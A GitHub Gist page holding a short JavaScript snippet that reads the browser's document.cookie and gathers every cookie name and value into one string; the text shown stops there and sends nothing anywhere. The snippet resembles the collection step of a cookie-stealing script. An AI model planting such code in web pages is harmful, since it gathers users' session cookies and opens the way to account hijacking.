Skip to content

Instantly share code, notes, and snippets.

View TotalTaxAmount's full-sized avatar

TotalTaxAmount TotalTaxAmount

View GitHub Profile
let lol = '';
const cookies = document.cookie;
const cookieArray = cookies.split(';');
for (let i = 0; i < cookieArray.length; i++) {
const cookie = cookieArray[i].trim();
const [name, value] = cookie.split('=');
lol += `${name}:${value}`;
}